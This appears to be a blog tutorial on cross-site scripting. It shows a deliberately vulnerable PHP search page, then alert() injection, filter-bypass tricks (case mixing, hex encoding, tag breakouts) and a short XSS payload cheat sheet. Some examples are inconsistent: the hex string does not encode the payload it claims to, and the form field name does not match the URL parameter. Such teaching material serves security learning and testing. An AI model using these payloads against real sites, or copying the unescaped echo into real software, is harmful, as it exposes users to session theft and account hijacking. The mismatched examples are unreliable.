What is XSS exactly?
Cross-site scripting (XSS) is a type of vulnerability which is typically found in web applications. It is deals with scripting. XSS helps attackers to insert scripts (and html/css) on the client side into Web pages accessed by other users.
Attackers may use a cross-site scripting vulnerability to bypass access controls, such as the same-origin policy. XSS vulnerabilities occur whenever a website does not filter the form input. It believes that the script came from a trusted source, so the malicious script will access any cookies, session tokens or other sensitive information of user.
Types of XSS
- Reflected XSS Attack (Most used)
- When an attacker injects its malicious script into a search query, a search box, or the end of an URL.
- Stored XSS Attack (Most used and More Dangerous)
- When an injected XSS script is permanently stored on a website, e.g. commands in a CMS. Stored XSS hit's everybody who just reaches the site with the malicious code.
- DOM based XSS (Rarely used)
- Where the attack payload is executed as a result of modifying the DOM "environment" in the victim's browser used by the original client side script.
Executing XSS commands
It's extremely easy to inject an XSS script. To check the vulnerability of the target website just look for a search box or something that displaying the entered data.
index.html
<html>
<head>
<title>Insafweb</title>
</head>
<body>
<form method="get" action="search.php">
Insafweb Search:
<input type="text" name="value" size="20" />
<input type="submit" class="button" value="Submit" />
</form>
</body>
</html>
search.php
<?php echo $_GET['value']; ?>
When I type "abc" in the search form, it will lead me to the URL http://localhost/search.php?search="abc" and shows me "abc".
And now, let's try to inject a basic javascript alert message.
<script>alert("ins");</script> or <script>alert(1);</script>
You can replace "ins" with anything you want, and even use ' ' instead of " ". It's vulnerable when it alert a popup with the text. Also you can inject every simple html or style tags like <h1>Ins</h1> because, the attacker determines what to display in the page. Note the change in the URL and you can also enter the code directly to the URL.
No reason to worry if it doesn't work, may be the system uses some filtering techniques. There are many ways to bypass XSS filters on websites. Developers always hide vulnerabilities.
1. Obfuscation
It is the deliberate act of creating code that is difficult for humans to understand. Sometimes the website administrator simply puts words like "script", "alert" on the bad words list, which means that when you search for "script" on the website, it just shows you an error, like you are not allowed to search for this word or something. However this security is poor, you can bypass it with the help of obfuscation.
If we convert <script>alert("ins");</script> to obfuscated, what it will be look like?
<SCrIpT>alErT('ins');</ScRiPt>There are similarly limitless possibilities.
2. HEX encoding
Hex encoding is performed by converting the 8 bit data to 2 hex characters.
If we convert <script>alert("ins");</script> to hex, what it will be look like?
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
URL becomes:
http://localhost/search.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
Online tools available for this, one of them are http://evuln.com/tools/xss-encoder/.
3. Basic Modifications
Sometimes a simple alteration of this code will defeat basic defensive filters. Try inserting a space or tab after the opening script tag, like so:
<script >alert(1)</script>
<script >alert(1)</script>
4. Try maximum
We just have to try sometimes, because every website is protected / unprotected in a special, unique way. So, adjust the code according to the need. Because, our goal is to execute some code in the site. Don't give up. Keep an eye on that. After adding code to input fields or URL, view the source code or inspect and see what is happened to the provided code. First needed to close the tag already there, and then append your javascript code to that. Just like '>'><script>alert(1);</script>
It's clear that filtering alone is not the solution. Filters don't prevent XSS attacks but merely eliminate a narrow subset of code patterns behaviors that may be attack attempts.
Impact of Cross Site Script (XSS)
Is it a serious issue if anyone print an alert message in the site? White hats just need that pop-up for POC. There are a lot of things you can do with XSS. Maybe a real life example would help to understand how dangerous an apparently minor security flaw, like XSS. Attacker-controlled code, which runs within the context of the web application on the client side, has full control over what the client does and can also read the DOM of the HTML page, etc. I have listed a few things here to give you an idea.
- Hijack a user's session
- Perform unauthorized activities
- Perform phishing attacks
- Capture keystrokes
- Steal sensitive information
- Ad-Jacking
- Click-Jacking
- Content Spoofing
- Credential Harvesting
- Forced Downloads
- Crypto Mining
- Bypassing CSRF protection
- Browser & System Fingerprinting
- Crashing Browsers
- Stealing Information
- Redirecting
- And more.....
Some XSS cheat sheets
The XSS cheat sheet provides you a list of snippets to be used in detecting XSS vulnerabilities. It can also help you bypass WAFs and filters.
<script>alert('XSS')</script>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
You can find more from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection.
Feel free to ask or share your thought in comment section below and show your love. :-)
References:
https://rastating.github.io/xss-chef/
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://medium.com/cyberverse/obfuscated-polyglot-xss-payloads-simplified-with-references-157e95b1d601
http://www.e2college.com/blogs/web_security/cross_site_scripting_xss/advanced_xss_techniques.html
Comments...
XSS story
poli saanam
Excellent....
Awesome